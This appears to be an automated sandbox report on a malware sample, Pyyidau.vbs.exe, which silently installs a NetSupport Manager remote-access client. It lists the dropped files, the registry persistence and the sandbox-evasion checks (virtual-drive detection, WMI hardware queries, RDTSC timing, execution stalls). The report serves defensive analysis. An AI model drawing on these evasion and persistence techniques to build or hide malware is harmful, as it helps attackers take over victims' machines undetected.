                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXEJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI204E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25E0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BA9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2465.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI24C5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI213F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C31.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6914.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B65.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2485.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6963.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DF0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI291F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E6F.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exeJump to dropped file
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Pyyidau.vbs.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2BE4.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20BE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI209E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI222E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI211F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E3F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20FE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2610.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FDE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI204E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C29.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI25E0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BA9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F7E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2465.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI219F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1EEF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI24C5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E8F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23F5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI264F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FCC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI213F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4C31.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29BD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6914.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B65.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B95.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2485.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6963.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51A0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI207D.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1ECF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21DF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DF0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2504.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI291F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI215F.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E6F.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1B79.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI68D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI201E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1AFB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2BE4.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI57BD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2435.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20BE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI21BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI209E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI51C1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI222E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F4F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI20DE.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI211F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1E3F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1F1F.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1BC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FBE.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,GetCurrentDirectoryW,_wcsrchr,PostMessageW,KiUserCallbackDispatcher,_fputs,Sleep,32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setuperr.log

                                Boot Survival

                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Windows\Installer\MSI3FCC.tmpRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PCIsys
                                Source: C:\Windows\Installer\MSI3FCC.tmpRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\HyperVideo
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B29630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,_memset,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW,28_2_00B29630

                                Hooking and other Techniques for Hiding and Protection

                                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49832
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B244C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,28_2_00B244C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004944C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,30_2_004944C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,32_2_001B44C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B14760 GetModuleFileNameW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_00B14760
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmp Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI264F.tmp Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmp Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI2BE4.tmp Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmp Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI3FCC.tmp Process information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmp Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Installer\MSI51C1.tmp Process information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM
                                Source: C:\Windows\Installer\MSI3FCC.tmp Stalling execution: Execution stalls by calling Sleep
                                Source: C:\Windows\Installer\MSI264F.tmp Stalling execution: Execution stalls by calling Sleep graph_28-56068
                                Source: c:\users\user\desktop\pyyidau.vbs.exe Key value queried: Powershell behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PointingDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_SoundDevice
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe System information queried: FirmwareTableInformation
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe RDTSC instruction interceptor: First address: 69EAADB3 second address: 69EAADA8 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 mov dword ptr [ebp-08h], eax 0x00000006 mov dword ptr [ebp-04h], edx 0x00000009 mov eax, dword ptr [ebp-08h] 0x0000000c sub eax, dword ptr [ebp-10h] 0x0000000f mov edx, dword ptr [ebp-04h] 0x00000012 sbb edx, dword ptr [ebp-0Ch] 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0008h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d mov ecx, edi 0x0000001f mov dword ptr [ebp-18h], eax 0x00000022 mov dword ptr [ebp-14h], edx 0x00000025 call 00007F7CB0B27610h 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d sub esp, 10h 0x00000030 push ebx 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 rdtsc
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe RDTSC instruction interceptor: First address: 6C65ADB3 second address: 6C65ADA8 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 mov dword ptr [ebp-08h], eax 0x00000006 mov dword ptr [ebp-04h], edx 0x00000009 mov eax, dword ptr [ebp-08h] 0x0000000c sub eax, dword ptr [ebp-10h] 0x0000000f mov edx, dword ptr [ebp-04h] 0x00000012 sbb edx, dword ptr [ebp-0Ch] 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0008h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d mov ecx, edi 0x0000001f mov dword ptr [ebp-18h], eax 0x00000022 mov dword ptr [ebp-14h], edx 0x00000025 call 00007F7CB12DF450h 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d sub esp, 10h 0x00000030 push ebx 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 rdtsc
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe RDTSC instruction interceptor: First address: 6C65ADB3 second address: 6C65ADA8 instructions: 0x00000000 rdtsc 0x00000002 pop ebx 0x00000003 mov dword ptr [ebp-08h], eax 0x00000006 mov dword ptr [ebp-04h], edx 0x00000009 mov eax, dword ptr [ebp-08h] 0x0000000c sub eax, dword ptr [ebp-10h] 0x0000000f mov edx, dword ptr [ebp-04h] 0x00000012 sbb edx, dword ptr [ebp-0Ch] 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0008h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d mov ecx, edi 0x0000001f mov dword ptr [ebp-18h], eax 0x00000022 mov dword ptr [ebp-14h], edx 0x00000025 call 00007F7CB0B27610h 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d sub esp, 10h 0x00000030 push ebx 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Memory allocated: 4380000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Memory allocated: 7FB0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Memory allocated: 7FE0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Memory allocated: 8040000 memory reserve | memory write watch
                                Source: C:\Windows\Installer\MSI3FCC.tmp Code function: 32_2_0018D970 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,__wcsicoll,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,32_2_0018D970
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Thread delayed: delay time: 922337203685477
